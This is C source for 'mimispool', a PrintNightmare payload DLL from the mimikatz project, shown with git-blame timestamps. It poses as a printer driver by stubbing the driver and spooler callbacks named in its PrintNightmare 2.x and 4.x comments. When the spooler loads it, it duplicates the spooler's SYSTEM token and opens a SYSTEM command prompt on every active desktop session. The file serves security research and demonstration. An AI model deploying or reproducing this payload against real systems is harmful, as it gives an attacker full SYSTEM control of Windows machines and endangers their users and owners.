2021-07-05 13:02:26 +00:00
|
|
|
/* Benjamin DELPY `gentilkiwi`
|
|
|
|
|
https://blog.gentilkiwi.com
|
|
|
|
|
benjamin@gentilkiwi.com
|
|
|
|
|
Licence : https://creativecommons.org/licenses/by/4.0/
|
|
|
|
|
*/
|
|
|
|
|
#include "mimispool.h"
|
|
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
|
2021-07-05 13:02:26 +00:00
|
|
|
{
|
2021-07-29 09:23:38 +00:00
|
|
|
UNREFERENCED_PARAMETER(hinstDLL);
|
|
|
|
|
UNREFERENCED_PARAMETER(lpReserved);
|
|
|
|
|
|
|
|
|
|
if (fdwReason == DLL_PROCESS_ATTACH)
|
|
|
|
|
{
|
|
|
|
|
RunProcessForAll(L"cmd.exe");
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
return TRUE;
|
2021-07-09 21:27:22 +00:00
|
|
|
}
|
|
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
// PrintNightMare 2.x - via config file and/or "real driver"
|
|
|
|
|
VOID APIENTRY DrvResetConfigCache()
|
2021-07-09 21:27:22 +00:00
|
|
|
{
|
2021-07-29 09:23:38 +00:00
|
|
|
;
|
|
|
|
|
}
|
2021-07-09 21:27:22 +00:00
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
|
|
|
|
|
{
|
|
|
|
|
BOOL status = FALSE;
|
2021-07-09 21:27:22 +00:00
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
if (dwMode == DRVQUERY_USERMODE)
|
2021-07-05 13:02:26 +00:00
|
|
|
{
|
2021-07-09 21:27:22 +00:00
|
|
|
*pcbNeeded = sizeof(DWORD);
|
|
|
|
|
if (pBuffer && (cbBuf >= sizeof(DWORD)))
|
|
|
|
|
{
|
|
|
|
|
status = TRUE;
|
2021-07-29 09:23:38 +00:00
|
|
|
*(DWORD*)pBuffer = TRUE;
|
2021-07-09 21:27:22 +00:00
|
|
|
}
|
|
|
|
|
SetLastError(ERROR_INSUFFICIENT_BUFFER);
|
2021-07-05 13:02:26 +00:00
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
2021-07-09 21:27:22 +00:00
|
|
|
SetLastError(ERROR_INVALID_PARAMETER);
|
2021-07-05 13:02:26 +00:00
|
|
|
}
|
|
|
|
|
|
2021-07-09 21:27:22 +00:00
|
|
|
return status;
|
|
|
|
|
}
|
|
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
|
2021-07-09 21:27:22 +00:00
|
|
|
{
|
|
|
|
|
BOOL status = FALSE;
|
|
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
if ((iEngineVersion < 0x20000) || (cj < 0x10))
|
2021-07-09 21:27:22 +00:00
|
|
|
{
|
|
|
|
|
SetLastError(ERROR_BAD_DRIVER_LEVEL);
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
pded->iDriverVersion = 0x20000;
|
|
|
|
|
pded->pdrvfn = NULL;
|
|
|
|
|
pded->c = 0;
|
|
|
|
|
status = TRUE;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
return status;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
VOID APIENTRY DrvDisableDriver()
|
|
|
|
|
{
|
2021-07-29 09:23:38 +00:00
|
|
|
;
|
2021-07-09 21:27:22 +00:00
|
|
|
}
|
|
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
|
|
|
|
|
|
|
|
|
|
// PrintNightMare 4.x - via CopyFiles
|
|
|
|
|
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
|
2021-07-09 21:27:22 +00:00
|
|
|
{
|
2021-07-29 09:23:38 +00:00
|
|
|
UNREFERENCED_PARAMETER(pszPrinterName);
|
|
|
|
|
UNREFERENCED_PARAMETER(pszDirectory);
|
|
|
|
|
UNREFERENCED_PARAMETER(pSplClientInfo);
|
|
|
|
|
UNREFERENCED_PARAMETER(dwLevel);
|
|
|
|
|
UNREFERENCED_PARAMETER(pszSourceDir);
|
|
|
|
|
UNREFERENCED_PARAMETER(pcchSourceDirSize);
|
|
|
|
|
UNREFERENCED_PARAMETER(pszTargetDir);
|
|
|
|
|
UNREFERENCED_PARAMETER(pcchTargetDirSize);
|
|
|
|
|
UNREFERENCED_PARAMETER(dwFlags);
|
|
|
|
|
|
|
|
|
|
return ERROR_SUCCESS;
|
2021-07-05 13:02:26 +00:00
|
|
|
}
|
|
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
|
2021-07-05 13:02:26 +00:00
|
|
|
{
|
2021-07-29 09:23:38 +00:00
|
|
|
UNREFERENCED_PARAMETER(pszPrinterName);
|
|
|
|
|
UNREFERENCED_PARAMETER(pszKey);
|
|
|
|
|
UNREFERENCED_PARAMETER(dwCopyFileEvent);
|
|
|
|
|
|
|
|
|
|
return TRUE;
|
2021-07-05 13:02:26 +00:00
|
|
|
}
|
|
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
// Kiwi payload - SYSTEM on all active desktop(s)
|
|
|
|
|
BOOL RunProcessForAll(LPWSTR szProcess)
|
2021-07-05 13:02:26 +00:00
|
|
|
{
|
2021-07-29 09:23:38 +00:00
|
|
|
BOOL status = FALSE;
|
|
|
|
|
STARTUPINFO si = { 0 };
|
|
|
|
|
PROCESS_INFORMATION pi = { 0 };
|
|
|
|
|
HANDLE hToken, hNewToken;
|
|
|
|
|
DWORD i, count;
|
|
|
|
|
LPVOID Environment;
|
|
|
|
|
PSESSIONIDW sessions;
|
|
|
|
|
|
|
|
|
|
si.cb = sizeof(si);
|
|
|
|
|
si.lpDesktop = L"winsta0\\default";
|
|
|
|
|
|
|
|
|
|
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
2021-07-05 13:02:26 +00:00
|
|
|
{
|
2021-07-29 09:23:38 +00:00
|
|
|
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
|
|
|
|
|
{
|
|
|
|
|
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
|
|
|
|
|
{
|
|
|
|
|
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
|
|
|
|
|
{
|
|
|
|
|
for (i = 0; i < count; i++)
|
|
|
|
|
{
|
|
|
|
|
if (sessions[i].State == State_Active)
|
|
|
|
|
{
|
|
|
|
|
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
|
|
|
|
|
{
|
|
|
|
|
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
|
|
|
|
|
{
|
|
|
|
|
CloseHandle(pi.hThread);
|
|
|
|
|
CloseHandle(pi.hProcess);
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
if (sessions)
|
|
|
|
|
{
|
|
|
|
|
WinStationFreeMemory(sessions);
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
DestroyEnvironmentBlock(Environment);
|
|
|
|
|
}
|
|
|
|
|
CloseHandle(hNewToken);
|
|
|
|
|
}
|
|
|
|
|
CloseHandle(hToken);
|
2021-07-05 13:02:26 +00:00
|
|
|
}
|
2021-07-21 21:50:54 +00:00
|
|
|
|
2021-07-29 09:23:38 +00:00
|
|
|
return status;
|
2021-07-05 13:02:26 +00:00
|
|
|
}
|
